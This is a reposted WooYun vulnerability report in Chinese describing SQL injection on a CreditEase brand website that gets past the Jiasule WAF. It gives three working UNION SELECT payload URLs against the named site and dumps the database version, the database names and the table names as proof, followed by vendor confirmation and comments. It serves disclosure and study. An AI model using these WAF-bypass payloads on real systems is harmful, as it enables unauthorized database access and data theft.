宜信某站SQL注入绕过加速乐

admin 2017年3月23日17:47:34评论276 views字数 206阅读0分41秒阅读模式
摘要

2016-03-19: 细节已通知厂商并且等待厂商处理中
2016-03-20: 厂商已经确认,细节仅向厂商公开
2016-03-30: 细节向核心白帽子及相关领域专家公开
2016-04-09: 细节向普通白帽子公开
2016-04-19: 细节向实习白帽子公开
2016-05-04: 细节向公众公开

漏洞概要 关注数(31) 关注此漏洞

缺陷编号: WooYun-2016-186614

漏洞标题: 宜信某站SQL注入绕过加速乐

相关厂商: 宜信

漏洞作者: 学习委员

提交时间: 2016-03-19 19:19

公开时间: 2016-05-04 18:15

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: sql注射漏洞利用技巧

2人收藏


漏洞详情

披露状态:

2016-03-19: 细节已通知厂商并且等待厂商处理中
2016-03-20: 厂商已经确认,细节仅向厂商公开
2016-03-30: 细节向核心白帽子及相关领域专家公开
2016-04-09: 细节向普通白帽子公开
2016-04-19: 细节向实习白帽子公开
2016-05-04: 细节向公众公开

简要描述:

我知道这次可能上不了首页了。但是看在我花了三天时间过加速乐的份上给我全额RANK/WB吧 (^ωω^)

详细说明:

受影响站点:http://brand.creditease.cn(和 brcms.yixin.com 指向同一站点)

概述:本来发现三处注入的,但是一觉醒来有两处不见了(出问题的文件被删除了)。本来想找真实IP绑定hosts 访问的,奈何没找到,只能苦逼的走上绕 加速乐 的路,痛并快乐着。

宜信某站SQL注入绕过加速乐

出问题的URL:http://brand.creditease.cn/activity-single.htm?id=22

code 区域
给出过 加速乐 的几个Vector:
(1)http://brand.creditease.cn/activity-single.htm
?id=225.0UNION SELECT 1,(2),3,4,5,6,7,8,9,10,11,12,13,14,15,(user/*gdfger41gg4df5g41gdf5g4eredfg1df6g4d%0d%0a*/())
(2)http://brand.creditease.cn/activity-single.htm
?id=225.0UNION SELECT 1,(2),3,4,5,6,7,8,9,10,11,12,13,14,15,(`version`/*gdfger41gg4df5g41gdf5g4eredfg1df6g4d%0d%0a*/())
(3)http://brand.creditease.cn/activity-single.htm?id=225.0UNION /*!34000select-1.0%0a*/ ,2,3,4,5,6,7,8,9,10,11,12,13,14,15,(table_name) from`information_schema`.`tables`where`table_schema`='viweb' limit 0,1%23

跑出点数据证明一下(详细数据不跑):

code 区域
version() 和 user()
mysql 5.5.18.1-log
code 区域
数据库
information_schema
mysql
performance_schema
viweb
code 区域
数据表
activity
activity_agenda
activity_agenda2
activity_awards
activity_day
activity_honored_guest
activity_honored_guest_talk
activity_phases
activity_signup
activity_watch
file
file_type
interactive
interactive_honored_guest
interactive_votee
interactive_voter
interactive_watch
page_main
product
product_category
product_content
user_admin
user_info
user_other
user_pw_by_mail
user_safe
vi
vi_file
vi_file_category
vi_first_menu
vi_second_menu
z
z_state
z_type

漏洞证明:

已证明如上

修复方案:

不能太依赖 waf

版权声明:转载请注明来源 学习委员@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-03-20 18:15

厂商回复:

漏洞已确认,安排修复中。感谢白帽子提醒。
白帽子奖励正在申请中。。。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-03-20 19:37 | 邪少 ( 实习白帽子 | Rank:98 漏洞数:18 | 百里长苏)

    1

    白帽子奖励正在申请中。。 白帽子奖励申请失败.. 欢迎惠顾

  2. 2016-03-20 19:44 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低,根本轮不到去拼...)

    1

    看到这句话:我花了三天时间过加速乐的份上。我果断关注你了。哈哈哈哈。

  3. 2016-03-20 20:34 | 学习委员 ( 普通白帽子 | Rank:121 漏洞数:9 | 人生真是寂寞如雪!)

    1

    @_Thorns 不会令你失望的,哈哈

  4. 2016-03-20 23:17 | Exploit DB ( 普通白帽子 | Rank:699 漏洞数:156 | 水能载舟,亦可覆舟。)

    1

    就喜欢这种有耐心的白帽子 果断关注

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin